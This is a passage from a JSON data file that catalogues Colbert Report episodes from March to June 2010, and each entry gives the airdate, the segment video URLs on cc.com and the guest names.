        "http://thecolbertreport.cc.com/videos/z9bfu8/president-obama-mentions-stephen",
        "http://thecolbertreport.cc.com/videos/4nmlgo/health-care-marriage-counseling",
        "http://thecolbertreport.cc.com/videos/6qwf52/olympics-wrap-up---michael-buble",
        "http://thecolbertreport.cc.com/videos/ncbadn/don-cheadle",
        "http://thecolbertreport.cc.com/videos/zbx22j/sign-off---goodnight"
      ],
      "guest": "Don Cheadle"
    },
    {
      "date": "2010-03-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mevtpj/intro---03-02-10",
        "http://thecolbertreport.cc.com/videos/wa48j7/president-obama-s-first-physical",
        "http://thecolbertreport.cc.com/videos/u1ymnx/the-word---kid-owe",
        "http://thecolbertreport.cc.com/videos/odsatp/colbert-platinum---necker-nymph---lexus-lfa",
        "http://thecolbertreport.cc.com/videos/cc44qu/david-brooks",
        "http://thecolbertreport.cc.com/videos/ci6g0d/sign-off---goose-that-lays-the-golden-egg"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2010-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/srp7ci/jim-bunning-ends-filibuster",
        "http://thecolbertreport.cc.com/videos/37u7lc/greece-s-economic-downfall---scheherazade-rehman",
        "http://thecolbertreport.cc.com/videos/elhxu1/tip-wag---american-academy-of-pediatrics---starbucks",
        "http://thecolbertreport.cc.com/videos/m631tw/garry-wills",
        "http://thecolbertreport.cc.com/videos/d3nhmb/sign-off---goodnight"
      ],
      "guest": "Scheherazade Rehman, Garry Wills"
    },
    {
      "date": "2010-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lfv3jf/health-care-magic",
        "http://thecolbertreport.cc.com/videos/cgobmb/iraqracy",
        "http://thecolbertreport.cc.com/videos/qdumax/tip-wag---james-o-keefe---sean-hannity",
        "http://thecolbertreport.cc.com/videos/vy9si5/barry-schwartz",
        "http://thecolbertreport.cc.com/videos/r3uuup/sign-off---see-you-later--alligator"
      ],
      "guest": "Barry Schwartz"
    },
    {
      "date": "2010-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1919hp/exclusive---olympic-international-houses-pt--2",
        "http://thecolbertreport.cc.com/videos/zqfavl/action-center---health-care-bill---ezra-klein",
        "http://thecolbertreport.cc.com/videos/1nrjt6/tom-hanks-pt--1",
        "http://thecolbertreport.cc.com/videos/49pae4/tom-hanks-pt--2",
        "http://thecolbertreport.cc.com/videos/60qghm/sign-off---one-thought",
        "http://thecolbertreport.cc.com/videos/xdowah/exclusive---olympic-international-houses-pt--1"
      ],
      "guest": "Tom Hanks"
    },
    {
      "date": "2010-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6zrwd6/consumer-alert---pringles",
        "http://thecolbertreport.cc.com/videos/rokdab/the-word---define---conquer",
        "http://thecolbertreport.cc.com/videos/b670fj/tip-wag---joe-lieberman--the-pope---sharks",
        "http://thecolbertreport.cc.com/videos/evq830/annie-leonard",
        "http://thecolbertreport.cc.com/videos/887xl8/sign-off---goodnight"
      ],
      "guest": "Annie Leonard"
    },
    {
      "date": "2010-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rj79bv/intro---03-10-10",
        "http://thecolbertreport.cc.com/videos/ij37tl/non-sexual-groping",
        "http://thecolbertreport.cc.com/videos/94dkr8/health-care-vote-information-nerve-center---charlie-cook",
        "http://thecolbertreport.cc.com/videos/9m4kr7/survival-seed-bank",
        "http://thecolbertreport.cc.com/videos/ski7ov/sean-carroll",
        "http://thecolbertreport.cc.com/videos/4k81na/sign-off---the-colbert-repoll"
      ],
      "guest": "Sean Carroll"
    },
    {
      "date": "2010-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nce2ba/karl-rove-s-new-book",
        "http://thecolbertreport.cc.com/videos/8tmwv8/the-colbert-repoll---scott-rasmussen",
        "http://thecolbertreport.cc.com/videos/8r95fc/monkey-on-the-lam---florida",
        "http://thecolbertreport.cc.com/videos/c8f0b1/david-aaronovitch",
        "http://thecolbertreport.cc.com/videos/96nihd/sign-off---thanks--karl-rove"
      ],
      "guest": "David Aaronovitch"
    },
    {
      "date": "2010-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mz0yt2/intro---03-15-10",
        "http://thecolbertreport.cc.com/videos/hut7vd/daylight-savings-time",
        "http://thecolbertreport.cc.com/videos/cfbe28/the-word---afghanistan",
        "http://thecolbertreport.cc.com/videos/402t35/i-can-t-believe-it-s-not-buddha---raj-patel",
        "http://thecolbertreport.cc.com/videos/rf3mus/robert-baer",
        "http://thecolbertreport.cc.com/videos/mdf427/sign-off---goodnight-with-balloon"
      ],
      "guest": "Robert Baer"
    },
    {
      "date": "2010-03-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fmjopd/intro---03-16-10",
        "http://thecolbertreport.cc.com/videos/jz5m0e/barack-joe-bama",
        "http://thecolbertreport.cc.com/videos/wuyjzf/i-s-on-edjukashun---texas-school-board",
        "http://thecolbertreport.cc.com/videos/wl96gx/thought-for-food---donna-simpson--le-whif---cat-litter",
        "http://thecolbertreport.cc.com/videos/4h8104/rebecca-skloot",
        "http://thecolbertreport.cc.com/videos/r6jed2/sign-off---remember-to-wear-green"
      ],
      "guest": "Rebecca Skloot"
    },
    {
      "date": "2010-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/86ybsq/ireland-s-shamrock-shortage",
        "http://thecolbertreport.cc.com/videos/wpflq2/sport-report---vasectomies--chess-boxing---golf",
        "http://thecolbertreport.cc.com/videos/m84hav/united-states-census-2010",
        "http://thecolbertreport.cc.com/videos/wqbtkw/nell-irvin-painter",
        "http://thecolbertreport.cc.com/videos/vvqhqa/sign-off---goodnight"
      ],
      "guest": "Nell Irvin Painter"
    },
    {
      "date": "2010-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9cthmz/middle-eastern-dogs",
        "http://thecolbertreport.cc.com/videos/oymi80/glenn-beck-attacks-social-justice---james-martin",
        "http://thecolbertreport.cc.com/videos/70uuap/cheating-death---clenched-fingers---pill-reminder",
        "http://thecolbertreport.cc.com/videos/42czdy/mary-matalin",
        "http://thecolbertreport.cc.com/videos/xqfew6/sign-off---goodnight"
      ],
      "guest": "Mary Matalin"
    },
    {
      "date": "2010-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uolmzb/passover-dinner-with-elijah",
        "http://thecolbertreport.cc.com/videos/ua8bnx/geriatric-breeding-program",
        "http://thecolbertreport.cc.com/videos/ixrazk/the-word---napoleon-blown-apart",
        "http://thecolbertreport.cc.com/videos/m8ik8j/passover-commercialism",
        "http://thecolbertreport.cc.com/videos/yksbdg/claire-mccaskill",
        "http://thecolbertreport.cc.com/videos/s0mkwg/sign-off---friedrich-schiller"
      ],
      "guest": "Sen. Claire McCaskill"
    },
    {
      "date": "2010-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/13gooh/intro---03-30-10",
        "http://thecolbertreport.cc.com/videos/fbk80n/ricky-martin-is-gay",
        "http://thecolbertreport.cc.com/videos/fvq7gv/the-word---forgive-and-forget",
        "http://thecolbertreport.cc.com/videos/dx0lyr/thought-for-food---corn-diapers--fatty-foods---jamie-oliver",
        "http://thecolbertreport.cc.com/videos/51a308/simon-johnson",
        "http://thecolbertreport.cc.com/videos/c9ef0m/sign-off---pringles---whipped-cream"
      ],
      "guest": "Simon Johnson"
    },
    {
      "date": "2010-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xyd8rc/intro---03-31-10",
        "http://thecolbertreport.cc.com/videos/phkk0m/who-s-not-honoring-me-now----peabody-awards",
        "http://thecolbertreport.cc.com/videos/mnvsrm/tip-wag---hutaree-militia---abc",
        "http://thecolbertreport.cc.com/videos/p9l3um/easter-under-attack---peeps-display-update",
        "http://thecolbertreport.cc.com/videos/wj35p0/craig-mullaney",
        "http://thecolbertreport.cc.com/videos/bnjl9e/sign-off---finger-pointing-award"
      ],
      "guest": "Craig Mullaney"
    },
    {
      "date": "2010-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cej48a/intro---04-01-10",
        "http://thecolbertreport.cc.com/videos/iymjih/stephen-gets-a-free-ipad",
        "http://thecolbertreport.cc.com/videos/2nbqob/elephant-graveyard---david-frum",
        "http://thecolbertreport.cc.com/videos/d9x5mh/jell-o-tampering",
        "http://thecolbertreport.cc.com/videos/3z9wwh/judith-shulevitz",
        "http://thecolbertreport.cc.com/videos/vjehbr/sign-off---goodnight-with-an-ipad"
      ],
      "guest": "David Frum, Judith Shulevitz"
    },
    {
      "date": "2010-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ehjj8/intro---04-05-10",
        "http://thecolbertreport.cc.com/videos/9ef1ri/stephen-converts-to-3d",
        "http://thecolbertreport.cc.com/videos/xo27p1/the-word---bait-and-snitch",
        "http://thecolbertreport.cc.com/videos/rp7kua/threatdown---fox--the-obamas---time-traveling-brandy-thieves",
        "http://thecolbertreport.cc.com/videos/672vju/dean-kamen",
        "http://thecolbertreport.cc.com/videos/zv5abl/sign-off---goodnight-in-3d"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2010-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l4nkoq/science-catfight---joe-bastardi-vs--brenda-ekwurzel",
        "http://thecolbertreport.cc.com/videos/506dri/scrabble-allows-proper-names",
        "http://thecolbertreport.cc.com/videos/hovkbz/al-sharpton",
        "http://thecolbertreport.cc.com/videos/z3ifg9/sign-off---goodnight"
      ],
      "guest": "Joe Bastardi, Brenda Ekwurzel, Rev. Al Sharpton"
    },
    {
      "date": "2010-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b1trvk/tiki-barber-cheats-on-his-wife",
        "http://thecolbertreport.cc.com/videos/ov8dk6/tip-wag---hello-kitty-wine---pig-s-blood-filters",
        "http://thecolbertreport.cc.com/videos/ds7vyt/nailed--em---fentimans-victorian-lemonade",
        "http://thecolbertreport.cc.com/videos/23bsc5/david-simon",
        "http://thecolbertreport.cc.com/videos/c3sk5b/sign-off---hello-kitty-wine---cigarettes"
      ],
      "guest": "David Simon"
    },
    {
      "date": "2010-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x3hnt4/intro---04-08-10",
        "http://thecolbertreport.cc.com/videos/p89oku/tiger-s-nike-commercial",
        "http://thecolbertreport.cc.com/videos/06i9x0/the-word---affirmative-inaction",
        "http://thecolbertreport.cc.com/videos/as4xr9/the-final-final-frontier",
        "http://thecolbertreport.cc.com/videos/kkc8ee/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/54hsqy/sign-off---no-man-is-a-failure"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2010-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5mdm7i/exclusive---julian-assange-extended-interview",
        "http://thecolbertreport.cc.com/videos/vxvlp9/unpaid-internship-crackdown",
        "http://thecolbertreport.cc.com/videos/ag970g/justice-stevens-replacement---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/3a0o7p/wikileaks-military-video",
        "http://thecolbertreport.cc.com/videos/q1yz2t/julian-assange",
        "http://thecolbertreport.cc.com/videos/abcefn/sign-off---goodnight"
      ],
      "guest": "Jeffrey Toobin, Julian Assange"
    },
    {
      "date": "2010-04-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z1lfjo/dow-hits-11-000",
        "http://thecolbertreport.cc.com/videos/fzwwcp/the-word---the-lost-cause",
        "http://thecolbertreport.cc.com/videos/l0qwni/thought-for-food---mentally-ill-advertisers---german-cupcakes",
        "http://thecolbertreport.cc.com/videos/aab36z/jon-mooallem",
        "http://thecolbertreport.cc.com/videos/qrdpob/sign-off---cupcake-chicken-sandwich"
      ],
      "guest": "Jon Mooallem"
    },
    {
      "date": "2010-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i50gi7/president-obama-bows-again",
        "http://thecolbertreport.cc.com/videos/xhpjb5/sunday-morning-fact-checking---jake-tapper---bill-adair",
        "http://thecolbertreport.cc.com/videos/f941v8/ryanair-charges-for-toilets",
        "http://thecolbertreport.cc.com/videos/ohefue/david-shields",
        "http://thecolbertreport.cc.com/videos/igm53s/sign-off---china-s-central-finance-ministry"
      ],
      "guest": "David Shields"
    },
    {
      "date": "2010-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eskkbc/intro---04-15-10",
        "http://thecolbertreport.cc.com/videos/1fannu/stephen-saves-the-space-program",
        "http://thecolbertreport.cc.com/videos/1ymc3v/tip-wag---forbes---hipsters",
        "http://thecolbertreport.cc.com/videos/5gztgb/formula-01-liquid-genetic-material",
        "http://thecolbertreport.cc.com/videos/q2q4mc/aimee-mullins",
        "http://thecolbertreport.cc.com/videos/t03669/sign-off---tax-deadline"
      ],
      "guest": "Aimee Mullins"
    },
    {
      "date": "2010-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o36u2p/marilyn-monroe-s-x-rays",
        "http://thecolbertreport.cc.com/videos/55ox6j/goldman-sachs--fraud-case---andrew-ross-sorkin",
        "http://thecolbertreport.cc.com/videos/cyx4fw/volcano-eyjafjallajokull",
        "http://thecolbertreport.cc.com/videos/ca04kl/george-will",
        "http://thecolbertreport.cc.com/videos/8di6ao/sign-off---too-big-to-fail"
      ],
      "guest": "Andrew Ross Sorkin, George Will"
    },
    {
      "date": "2010-04-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5kfqlg/intro---04-20-10",
        "http://thecolbertreport.cc.com/videos/q0xdhc/robotic-voice-simulator---foreign-accent-syndrome",
        "http://thecolbertreport.cc.com/videos/f5imzl/p-k--winsome---tea-party-consulting",
        "http://thecolbertreport.cc.com/videos/2o8c1s/stephen-refuses-to-celebrate-4-20",
        "http://thecolbertreport.cc.com/videos/n3iff5/jeffrey-katzenberg",
        "http://thecolbertreport.cc.com/videos/kuy0dk/sign-off---as-they-say-in-japan"
      ],
      "guest": "Jeffrey Katzenberg"
    },
    {
      "date": "2010-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6z2omj/the-new--100-bill",
        "http://thecolbertreport.cc.com/videos/2nsr1s/the-word---no-problemo",
        "http://thecolbertreport.cc.com/videos/mqfg58/nailed--em---drive-through-rapping",
        "http://thecolbertreport.cc.com/videos/0teg38/craig-robinson",
        "http://thecolbertreport.cc.com/videos/2tayao/sign-off---donate-to-john-legend-s-charity"
      ],
      "guest": "Craig Robinson"
    },
    {
      "date": "2010-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/62j0m5/newspapers-celebrate-earth-day",
        "http://thecolbertreport.cc.com/videos/tqucn8/the-word---straight-to-video",
        "http://thecolbertreport.cc.com/videos/g660yb/bonus-word---defamation-of-independents",
        "http://thecolbertreport.cc.com/videos/0le7r3/gorillaz",
        "http://thecolbertreport.cc.com/videos/s79r6n/sign-off---this-is-a-fun-job"
      ],
      "guest": "Gorillaz"
    },
    {
      "date": "2010-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i6lszt/intro---04-26-10",
        "http://thecolbertreport.cc.com/videos/exfe65/boobquake-day-causes-earthquake",
        "http://thecolbertreport.cc.com/videos/ddudkb/the-word---docu-drama",
        "http://thecolbertreport.cc.com/videos/4qgs1h/indecision-2010---midterm-elections---sue-lowden",
        "http://thecolbertreport.cc.com/videos/j7hi89/sharon-jones"
      ],
      "guest": "Sharon Jones and the Dap-Kings"
    },
    {
      "date": "2010-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5m4fi7/intro---04-27-10",
        "http://thecolbertreport.cc.com/videos/7b23mk/the-real-lloyd-blankfein",
        "http://thecolbertreport.cc.com/videos/ais5bh/stephen-hawking-is-such-an-a-hole---encountering-aliens",
        "http://thecolbertreport.cc.com/videos/rjye16/conn-iggulden",
        "http://thecolbertreport.cc.com/videos/68bzkf/sign-off---six-flags-discount-tickets"
      ],
      "guest": "Conn Iggulden"
    },
    {
      "date": "2010-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g493lv/intro---04-28-10",
        "http://thecolbertreport.cc.com/videos/uzkxfc/gulf-of-mexico-oil-spill",
        "http://thecolbertreport.cc.com/videos/tzdwrb/cheating-death---tobacco-mints--breast-milk---hallucinogens",
        "http://thecolbertreport.cc.com/videos/ke79c8/difference-makers---robert-ekas",
        "http://thecolbertreport.cc.com/videos/pj9ppq/gregg-easterbrook",
        "http://thecolbertreport.cc.com/videos/1tu0hz/sign-off---chief-wandering-meadow-s-headdress"
      ],
      "guest": "Gregg Easterbrook"
    },
    {
      "date": "2010-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qu7aln/intro---rube-goldberg-machine",
        "http://thecolbertreport.cc.com/videos/dima6g/wind-farm---oil-spill",
        "http://thecolbertreport.cc.com/videos/u1djps/california-s-proposition-14---abel-maldonado",
        "http://thecolbertreport.cc.com/videos/yqd68y/tip-wag---scientists---kfc",
        "http://thecolbertreport.cc.com/videos/byd88g/ok-go"
      ],
      "guest": "Abel Maldonado, OK Go"
    },
    {
      "date": "2010-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/caaib9/times-square-terrorism",
        "http://thecolbertreport.cc.com/videos/i2zwg4/fda-salt-regulation---lori-roman---michael-jacobson",
        "http://thecolbertreport.cc.com/videos/bfve2i/bp-s-undersea-dome",
        "http://thecolbertreport.cc.com/videos/6yc052/elizabeth-warren",
        "http://thecolbertreport.cc.com/videos/jj9r4k/sign-off---lady-liberty-souvenirs"
      ],
      "guest": "Elizabeth Warren"
    },
    {
      "date": "2010-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dula0l/intro---05-04-10",
        "http://thecolbertreport.cc.com/videos/zfi7tc/boom--doesn-t-go-the-dynamite",
        "http://thecolbertreport.cc.com/videos/dvwpph/the-word---flight-risk",
        "http://thecolbertreport.cc.com/videos/xyjhb7/stephen-hawking-is-such-an-a-hole---time-travel",
        "http://thecolbertreport.cc.com/videos/j2pf36/mark-moffett",
        "http://thecolbertreport.cc.com/videos/d97fmn/sign-off---michael-j--fox-gets-locked-in"
      ],
      "guest": "Michael J. Fox, Mark W. Moffett"
    },
    {
      "date": "2010-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nlh1ly/intro---05-05-10",
        "http://thecolbertreport.cc.com/videos/2nfnz7/nashville-flood-wakeboarder",
        "http://thecolbertreport.cc.com/videos/bw8v97/the-enemy-within---backyard-clothesline",
        "http://thecolbertreport.cc.com/videos/2p2tqn/alpha-dog-of-the-week---george-rekers",
        "http://thecolbertreport.cc.com/videos/pnjs6i/dave-isay",
        "http://thecolbertreport.cc.com/videos/xufsxi/sign-off---dancing-with-julian"
      ],
      "guest": "David Isay"
    },
    {
      "date": "2010-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pvx1hb/white-people-prayer-gap",
        "http://thecolbertreport.cc.com/videos/97ikxz/british-election-couverage---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/8a0q0r/movies-that-are-destroying-america---2010-summer-movie-edition",
        "http://thecolbertreport.cc.com/videos/xo7hie/stewart-brand",
        "http://thecolbertreport.cc.com/videos/0txjlv/sign-off---the-usa-today"
      ],
      "guest": "Stewart Brand"
    },
    {
      "date": "2010-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8bpcly/intro---05-10-10",
        "http://thecolbertreport.cc.com/videos/0m67h9/house-returns-the-favor",
        "http://thecolbertreport.cc.com/videos/pxkemd/greece-wither-soon---scheherazade-rehman",
        "http://thecolbertreport.cc.com/videos/oejc0z/oil-containment-solution-randomizer",
        "http://thecolbertreport.cc.com/videos/6ikft9/gary-johnson",
        "http://thecolbertreport.cc.com/videos/xeq5yb/sign-off---goodnight"
      ],
      "guest": "Gov. Gary Johnson"
    },
    {
      "date": "2010-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n8gkaf/intro---05-11-10",
        "http://thecolbertreport.cc.com/videos/pcdm2a/consumer-alert---best-friends-charm-bracelets",
        "http://thecolbertreport.cc.com/videos/1227nt/kagan-worship---dahlia-lithwick",
        "http://thecolbertreport.cc.com/videos/rp68kf/australian-sperm-shortage",
        "http://thecolbertreport.cc.com/videos/d04me7/hampton-sides",
        "http://thecolbertreport.cc.com/videos/qv4b2o/sign-off---wriststrong-arm"
      ],
      "guest": "Hampton Sides"
    },
    {
      "date": "2010-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nyl5ye/intro---05-12-10",
        "http://thecolbertreport.cc.com/videos/rxu3ed/controlled-burn-of-a-natural-gas",
        "http://thecolbertreport.cc.com/videos/zf5e7d/threatdown---military-food-police--jazz-robots---pretty-girls",
        "http://thecolbertreport.cc.com/videos/0mg8t8/stephen-s-sound-advice---how-to-ace-the-sats",
        "http://thecolbertreport.cc.com/videos/jynvz7/deepak-chopra",
        "http://thecolbertreport.cc.com/videos/0mpxm3/sign-off---fire-extinguisher-shooting"
      ],
      "guest": "Deepak Chopra"
    },
    {
      "date": "2010-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uic1xz/intro---05-13-10",
        "http://thecolbertreport.cc.com/videos/mp7sng/confirming-elena",
        "http://thecolbertreport.cc.com/videos/o1qad4/the-hold-steady",
        "http://thecolbertreport.cc.com/videos/ugcamu/sign-off---time-traveling-brandy-thief"
      ],
      "guest": "The Hold Steady"
    },
    {
      "date": "2010-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1heoo5/intro---6-1-10",
        "http://thecolbertreport.cc.com/videos/395e6g/vodka-eyeballing",
        "http://thecolbertreport.cc.com/videos/6f9c47/up-brit-creek",
        "http://thecolbertreport.cc.com/videos/p943d0/failure-to-launch---atlantis-crew",
        "http://thecolbertreport.cc.com/videos/ngl48j/ayaan-hirsi-ali",
        "http://thecolbertreport.cc.com/videos/jygylj/sign-off---water-eyeballing"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2010-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6707v3/intro---6-2-10",
        "http://thecolbertreport.cc.com/videos/gqwbeo/japan-s-special-election---kazuo-myazaki",
        "http://thecolbertreport.cc.com/videos/qrxaw1/tip-wag---foxconn--charles-taylor---naomi-campbell",
        "http://thecolbertreport.cc.com/videos/4dk71f/craziest-f--ing-thing-i-ve-ever-heard---gored-bullfighter",
        "http://thecolbertreport.cc.com/videos/dvcqzb/lisa-miller",
        "http://thecolbertreport.cc.com/videos/a4ztpz/sign-off---parting-gifts-for-kazuo-myazaki"
      ],
      "guest": "Lisa Miller"
    },
    {
      "date": "2010-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d81bvl/intro---6-3-10",
        "http://thecolbertreport.cc.com/videos/iy7vo7/crude---unusual",
        "http://thecolbertreport.cc.com/videos/44gj25/who-s-watching-the-watchdog----liam-mccormack",
        "http://thecolbertreport.cc.com/videos/p34tly/who-s-riding-my-coattails-now----ipad-suit-pocket",
        "http://thecolbertreport.cc.com/videos/fo5d9i/vampire-weekend"
      ],
      "guest": "Vampire Weekend"
    },
    {
      "date": "2010-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4arov/intro---6-7-10",
        "http://thecolbertreport.cc.com/videos/y0xgng/charity-begins-at-11-30",
        "http://thecolbertreport.cc.com/videos/lc7nxu/oil-s-well-that-never-ends",
        "http://thecolbertreport.cc.com/videos/c2l6b4/oil-spill-rage---james-carville",
        "http://thecolbertreport.cc.com/videos/30w6f5/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/ow5rnp/sign-off---gulf-of-america-fund"
      ],
      "guest": "James Carville, Jonathan Alter"
    },
    {
      "date": "2010-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uj5obr/obama-s-whoomp--there-it-is-controversy",
        "http://thecolbertreport.cc.com/videos/yj9oop/the-word---p-r--mageddon",
        "http://thecolbertreport.cc.com/videos/n3e887/mark-frauenfelder",
        "http://thecolbertreport.cc.com/videos/r1zjxy/sign-off---the-most-useless-machine"
      ],
      "guest": "Mark Frauenfelder"
    },
    {
      "date": "2010-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ou7te0/helen-thomas-s-reputation",
        "http://thecolbertreport.cc.com/videos/0eesk5/formidable-opponent---michael-oren",
        "http://thecolbertreport.cc.com/videos/41cjs4/shout-out---7th-eaccs",
        "http://thecolbertreport.cc.com/videos/12z179/sam-nunn",
        "http://thecolbertreport.cc.com/videos/hv8uj4/sign-off---50-hamburgers"
      ],
      "guest": "Amb. Michael Oren, Sen. Sam Nunn"
    },
    {
      "date": "2010-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6iz8ha/bp-stock-sinks",
        "http://thecolbertreport.cc.com/videos/e46kh9/sport-report---soccer-debate---marc-fisher---mark-starr",
        "http://thecolbertreport.cc.com/videos/9rht3y/simulated-mars-mission",
        "http://thecolbertreport.cc.com/videos/19ikyl/alan-bean",
        "http://thecolbertreport.cc.com/videos/gewg17/sign-off---chocolate-syrup"
      ],
      "guest": "Alan Bean"
    },
    {
      "date": "2010-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7xsbh3/intro---6-14-10",
        "http://thecolbertreport.cc.com/videos/vlk9h9/america-s-strained-relationship-with-england",
        "http://thecolbertreport.cc.com/videos/xhnftx/smokin--pole---the-quest-for-arctic-riches--canada---china",
        "http://thecolbertreport.cc.com/videos/b6bfik/who-s-not-honoring-me-now----tonys---mtv-movie-awards",
        "http://thecolbertreport.cc.com/videos/bd9ero/stephen-prothero",
        "http://thecolbertreport.cc.com/videos/t2lbqh/sign-off---the-new-oxford-american-dictionary"
      ],
      "guest": "Stephen Prothero"
    },
    {
      "date": "2010-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ue0g9m/intro---6-15-10",
        "http://thecolbertreport.cc.com/videos/w6pwpk/testoster-ruin---hanna-rosin",
        "http://thecolbertreport.cc.com/videos/o42e2u/tip-wag---marshall-islands---disney-world-fate",
        "http://thecolbertreport.cc.com/videos/zkoqn2/carl-safina",
        "http://thecolbertreport.cc.com/videos/vr28jt/sign-off---hot-boxers"
      ],
      "guest": "Dr. Carl Safina"
    },
    {
      "date": "2010-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vtw6mw/intro---6-16-10",
        "http://thecolbertreport.cc.com/videos/atwjd4/obama-s-bp-oil-spill-speech",
        "http://thecolbertreport.cc.com/videos/fq1qpx/the-word----tay-the-cour-e",
        "http://thecolbertreport.cc.com/videos/0occfp/brevity-is-the-soul-of-twit",
        "http://thecolbertreport.cc.com/videos/ak28k2/devo"
      ],
      "guest": "Devo"
    },
    {
      "date": "2010-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zp0vlt/exclusive---who-s-watching-the-watchdog-pt--1",
        "http://thecolbertreport.cc.com/videos/mgk9uw/exclusive---who-s-watching-the-watchdog-pt--2",
        "http://thecolbertreport.cc.com/videos/lmlfss/obama-s-simplified-bp-oil-spill-speech",
        "http://thecolbertreport.cc.com/videos/r0x7kl/south-carolina-s-4th-district-primary---bob-inglis",
        "http://thecolbertreport.cc.com/videos/pw3z5k/colbert-platinum---summer-travel-edition",
        "http://thecolbertreport.cc.com/videos/psfs9q/david-mamet",
        "http://thecolbertreport.cc.com/videos/t0bf7h/sign-off---retweet-for-the-gulf-of-america-fund"
      ],
      "guest": "David Mamet"
    },
    {
      "date": "2010-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xh3zp/us-ties-with-slovenia",
        "http://thecolbertreport.cc.com/videos/tsbncg/fallback-position---astronaut-pt--1",
        "http://thecolbertreport.cc.com/videos/lw3o9e/joe-barton-s-misconstrued-misconstruction",
        "http://thecolbertreport.cc.com/videos/6rxgjl/wes-moore",
        "http://thecolbertreport.cc.com/videos/xr56ob/sign-off---spare-cursed-monkey-s-paw"
      ],
      "guest": "Wes Moore"
    },
    {
      "date": "2010-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f7v2qo/who-s-riding-my-coattails-now----ipad-suit-pocket",
        "http://thecolbertreport.cc.com/videos/mt3j86/stanley-mcchrystal-talks-to-rolling-stone",
        "http://thecolbertreport.cc.com/videos/dry79y/fallback-position---astronaut-pt--2",
        "http://thecolbertreport.cc.com/videos/eyzb5g/usa-board-of-ophthalmological-freedom",
        "http://thecolbertreport.cc.com/videos/ej23e4/gloria-steinem",
        "http://thecolbertreport.cc.com/videos/jewfph/sign-off---goodnight"
      ],
      "guest": "Gloria Steinem"
    },
    {
      "date": "2010-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h4yffi/intro---6-23-10",
        "http://thecolbertreport.cc.com/videos/wcoc11/us-defeats-algeria",
        "http://thecolbertreport.cc.com/videos/licobk/yahweh-or-no-way---the-blues-brothers---glenn-beck",
        "http://thecolbertreport.cc.com/videos/3dk57p/prophet-glenn-beck---father-guido-sarducci",
        "http://thecolbertreport.cc.com/videos/quds8l/tim-westergren",
        "http://thecolbertreport.cc.com/videos/p3f9t8/sign-off---tomorrow-s-fallback-position"
      ],
      "guest": "Tim Westergren"
    },
    {
      "date": "2010-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k3vali/intro---6-24-10",
        "http://thecolbertreport.cc.com/videos/i8ohf4/put-the-cursed-monkey-paw-down",
        "http://thecolbertreport.cc.com/videos/5m2oyq/the-word---weapon-of-mass-construction",
        "http://thecolbertreport.cc.com/videos/6ppo8y/fallback-position---astronaut-pt--3",
        "http://thecolbertreport.cc.com/videos/3td47y/michael-specter",
        "http://thecolbertreport.cc.com/videos/86kjse/sign-off---general-s-cap"
      ],
      "guest": "Michael Specter"
    },
    {
      "date": "2010-06-28",
      "videos": [
